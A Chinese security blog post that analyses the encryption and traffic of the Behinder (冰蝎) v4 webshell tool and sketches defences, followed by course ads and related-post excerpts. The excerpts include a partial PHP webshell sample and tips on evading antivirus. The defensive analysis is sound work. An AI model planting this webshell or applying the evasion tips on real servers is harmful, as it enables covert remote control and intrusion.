攻防演练的Webshell利器——冰蝎V4分析

已于 2024-01-19 18:14:40 修改
阅读量589 收藏 1
点赞数
文章标签: 服务器 网络 windows
于 2023-08-02 12:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Karka_/article/details/132042931
版权

01、 冰蝎简介

最近攻防演练期间,Webshell工具界再次祭出大杀器“ BehinderV4.0
”。看来蓝队的头发又要“保不住”了;看不完的流量包,解不完的绕过编码。

本次冰蝎新增了5种加密方式xor、xor_base64、aes、json和image。本文通过对该工具的分析,来分享一下对于防护此类工具的思考。

02、 通讯过程

先看下基本过程:

1. 客户端向服务端请求密钥;

2. 服务端记录下客户端相关信息,生成随机密钥,并将两份消息发送给客户端;

3. 客户端将收到的密钥通过AES对称加密算法,对payload攻击脚本进行加密。然后再进过base64编码对加密过后对二进制流进行编码。发送给服务端;

4. 服务端通过base64解码以后,再利用刚刚的密钥解密,获得payload并执行。将执行结果加密返回给客户端;

5. 客户端解密获得最终消息。

03、 案例讲解

1. 客户端向服务端请求密钥

客户端在运行时,首先以GET请求携带密码字段向服务器发起握手请求,获取此次会话的加密密钥和Cookie值。加密密钥用来对后续发送的Payload进行AES加密;上文我们说到服务器端随机产生密钥之后会存到当前Session中,同时会以set-
cookie的形式给客户端一个SessionID,客户端获取密钥的同时也要获取该Cookie值,以用来标识客户端身份,服务器端后续可以通过客户端传来的Cookie值中的SessionID来从Session中取出该客户端对应的密钥进行解密操作。

主要代码如下:

image.png

客户端每次都会通过服务器发来的随机密钥。对攻击payload进行加密。

2. 客户端对Payload进行加密

案例中给出的是一个执行打开当前文件的命令(open
./),下面给出Payload小样:image.png

冰蝎的加密思路可以分为如下几个步骤:

  • 读取二进制的payload,并将其使用AES加密(密钥为上一步向服务器请求到的密钥);

  • 通过Base64进行编码:

image.png

其实到这一步就可以看出来冰蝎的一个思路流程图(左侧为客户端,右侧为服务器):

image.png

AES的密钥是随机生成的,下面的一段代码摘自冰蝎作者的密钥生成模块:

image.png

image.png

查看一下运行的随机结果,蓝队是不是压力突然就上来了?流量的特征完全随机。

前面对于客户端铺垫了这么多,那现在就看看服务端的执行结果:

image.png

image.png

小结:

到这里,基本上讲完了冰蝎4.0版本这个工具的牛X的地方啦!将Payload加密,但是本文并非是工具编写的教程,所以实现细节的话还是看大佬的原文吧!https://xz.aliyun.com/t/2744。

04、 防护思路

因为密钥的变化,直接抓取Payload流量过程中的特征几乎是不太可能的。但是如果将可疑流量保存下来,获取密钥并进行解密,那也不是不可能的。

还有一种难度系数较小的方案是,即从文件上传的角度来防护。

是不太可能的。但是如果将可疑流量保存下来,获取密钥并进行解密,那也不是不可能的。

还有一种难度系数较小的方案是,即从文件上传的角度来防护。

网络安全学习路线

这是一份网络安全从零基础到进阶的学习路线大纲全览,小伙伴们记得点个收藏!

img[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-lRBjIVSR-1690874246172)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]编辑

阶段一:基础入门

img[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-k1kdYINV-1690874246173)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]

网络安全导论

渗透测试基础

网络基础

操作系统基础

Web安全基础

数据库基础

编程基础

CTF基础

该阶段学完即可年薪15w+

阶段二:技术进阶(到了这一步你才算入门)

img[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Mwj19QXp-1690874246173)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]

弱口令与口令爆破

XSS漏洞

CSRF漏洞

SSRF漏洞

XXE漏洞

SQL注入

任意文件操作漏洞

业务逻辑漏洞

该阶段学完年薪25w+

阶段三:高阶提升

img[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-U7jRpbxB-1690874246173)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]

反序列化漏洞

RCE

综合靶场实操项目

内网渗透

流量分析

日志分析

恶意代码分析

应急响应

实战训练

该阶段学完即可年薪30w+

阶段四:蓝队课程

img[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-aD9VT5Ii-1690874246174)(data:image/gif;base64,R0lGODlhAQABAPABAP///wAAACH5BAEKAAAALAAAAAABAAEAAAICRAEAOw==)]

蓝队基础

蓝队进阶

该部分主攻蓝队的防御,即更容易被大家理解的网络安全工程师。

攻防兼备,年薪收入可以达到40w+

阶段五:面试指南&阶段六:升级内容

img

需要上述路线图对应的网络安全配套视频、源码以及更多网络安全相关书籍&面试题等内容

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

同学们可以扫描下方二维码获取哦!

程序员桔子
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
冰蝎加密 WebShell 过杀软
悦分享
08-03 2279
演练中,第一代webshell管理工具“菜刀”的攻击流量特征明显,容易被安全设备检测到,攻击方越来越少使用,加密webshell 正变得越来越流行,由于流量加密,传统的WAF、WebIDS设备难以检测,给威胁监控带来较大挑战。这其中最出名就是“冰蝎”,“冰蝎”是一款动态二进制加密网站管理客户端,演练中给防守方造成很大困扰,本文将对“冰蝎”的加密原理、流量特征、检测方案进行探讨。"冰蝎"客户端基于JAVA,所以可以跨平台使用,最新版本为v3.0 bate,兼容性较之前的版本有较大提升。...
冰蝎webshell,
08-18
在虚拟机中使用并断网断电 在虚拟机中使用并断网断电 在虚拟机中使用并断网断电 在虚拟机中使用并断网断电 在虚拟机中使用并断网断电 在虚拟机中使用并断网断电 在虚拟机中使用并断网断电 主要的事情说三遍
冰蝎4.0特征分析及流量检测思路
A_991128a的博客
08-07 648
从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。干货主要有:①1000+CTF历届题库(主流和经典的应该都有了)②CTF技术文档(最全中文版)③项目源码(四五十个有趣且经典的练手项目及源码)
冰蝎的原理与安装使用(3),2024年最新【大牛疯狂教学】
最新发布
2401_83739434的博客
04-16 759
冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,由于通信流量被加密,传统的WAF、IDS 设备难以检测,给威胁狩猎带来较大挑战。冰蝎其最大特点就是对交互流量进行对称加密,且加密密钥是由随机数函数动态生成,因此该客户端的流量几乎无法检测。而老牌的如中国菜刀因为其流量特征太过明显,从而使用的场景越来越少。不过在此还是要致敬前辈的贡献。
冰蝎的原理与安装使用,2024年网络安全者未来的出路在哪里
m0_60635176的博客
04-09 986
觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)**[外链图片转存中…(img-6UJpGMns-1712612036038)]
强大的webshell管理工具——冰蝎
12-26
只有适合自己的工具,没有好坏之分,请免费拿走。
冰蝎-Webshell管理工具
weixin_66717977的博客
06-30 5697
冰蝎超详解,新手食用
Web安全-Behinder(冰蝎Webshell管理工具使用
Boom!脑洞大爆炸的博客
07-03 3404
Web安全-Behinder(冰蝎Webshell管理工具使用
Webshell管理(冰蝎
weixin_45253622的博客
03-15 2240
冰蝎 运行环境安装(jre6~jre8) 工具安装 解压后如下: 需要在文件夹内运行终端,我们新建.txt 文件,文本内容添加cmd,并将其后缀改为.bat 双击运行。 测试(本机) 启动phpstudy 访问127.0.0.1:8080成功访问。 在网站根目录下创建木马文件,将冰蝎server自带shell.php内容复制进去 然后使用冰蝎连接,默认密码在内容里 双击目录,连接成功。 首页就是phpinfo 基本信息模块 命令执行 虚拟终端 文件管理 内网渗透 反弹shell 这里
冰蝎V4.1Behinder
03-11
冰蝎V4.1Behinder
webshell连接工具冰蝎2.0,后面有三点零的,找一找再发
12-28
做渗透的,不支持恶意攻击
冰蝎v2.0.1.zip
05-19
冰蝎webshell连接工具,无毒无后门,可放心使用
webshell一句话
08-26
php,jsp,asp等脚本的常用一句话拿webshell,然后用菜刀连接即可
特征码免杀webshell
05-04
特征码免杀webshell免杀性能好。稳定性强这个是非常好的一份开源代码。
AWD攻防漏洞分析——文件上传
01-20
这个漏洞在DVBBS6.0时代被hacker们利用的最为猖獗,利用上传漏洞可以直接得到WEBSHELL,危害等级高,入侵中上传漏洞也是常见的漏洞。 导致改漏洞的原因在于代码作者没有对访客提交的数据进行检验或者过滤不严,可以...
冰歇webshell初探
qq_69775412的博客
04-22 5480
木马样本: <?php class C{ public function __invoke($p) { eval($p.""); } }; session_start(); isset($_GET['pass'])?print $_SESSION['k']=substr(md5(uniqid(rand())),16):($b=explode('|',openssl_decrypt(file_get_contents("php://input"), "AES128", $_SESSIO
冰蝎利用免杀webshell链接,反弹shell(附免杀webshell和工具)
qq_41132792的博客
09-06 2001
我们这里需要的是java环境,版本的话最好就是安装Java最新的了,Windows也是可以使用的,我这里主要介绍的是Linux上使用,我是基于kali中使用的。我们因为是实验的关系,本地搭建一个网站就好了,Windows的选择phpstudy就好,Linux的百度一下安装下apache即可。然后会弹出我们的图形界面,这里我们就先停一下,将我们的木马传到/var/www/html这个文件夹中,这里我们可以自定义请求头,然后保存即可,保存完我们双击进去。首先我们启动冰蝎,这里我将它放到了我的工具包中,
冰蝎webshell免杀(技巧)
hackzkaq的博客
05-06 1934
零基础学黑客,搜索公众号:白帽子左一 前段时间退出了内网的学习,现在开始复习web方面的漏洞了,于是乎,开始了挖洞之旅,当我像往常一样上传冰蝎webhsell时,发现冰蝎的马子居然被杀了…于是便有了该文章… 先说一下目前的免杀情况: D盾,河马等都零警报, vt全绿, 阿里云webshell查杀安全, 百度webshell查杀安全, 其他等等… 目前仅测试了这些…其他的自行测试。 文章开始: 首先看一下冰蝎的原版马子: <?php @error_reporting(0); session_star
冰蝎
世间繁华梦一出
03-04 3334
冰蝎什么是冰蝎冰蝎的特点加密原理通信过程 什么是冰蝎? “冰蝎”是一个动态二进制加密网站管理客户端。在实战中,第一代webshell管理工具"菜刀"的流量特征非常明显,很容易就被安全设备检测到。基于流量加密的webshell变得越来越多,"冰蝎"在此应运而生。 "冰蝎"客户端基于JAVA,所以可以跨平台使用,最新版本为v2.0.1,兼容性较之前的版本有较大提升。主要功能为:基本信息、命令执行、虚拟终端、文件管理、Socks代理、反弹shell、数据库管理、自定义代码等,功能非常强大 冰蝎的特点 流量加密
webshell管理工具冰蝎应该怎么安装
05-14
冰蝎是一款常用的WebShell管理工具,它可以帮助管理员进行WebShell的检测、管理和清除等操作。以下是安装冰蝎的步骤: 1. 下载冰蝎的安装包,可以在官网(https://github.com/rebeyond/Behinder/releases)下载最新版的安装包。 2. 解压安装包,将所有文件放在Web服务器的任意位置,比如放在Web根目录下的“behinder”文件夹。 3. 修改“behinder”文件夹下的“index.jsp”文件,将其中的密码改为自己指定的密码。 4. 在Web浏览器中输入Web服务器地址和“behinder”文件夹的路径,比如“http://example.com/behinder/index.jsp”。 5. 在登录页面输入自己设置的密码,登录成功后就可以使用冰蝎进行WebShell管理了。 需要注意的是,在使用冰蝎进行WebShell管理时,一定要注意安全性,避免被黑客利用。比如,可以通过设置访问密码、限制IP地址等方式来增强安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值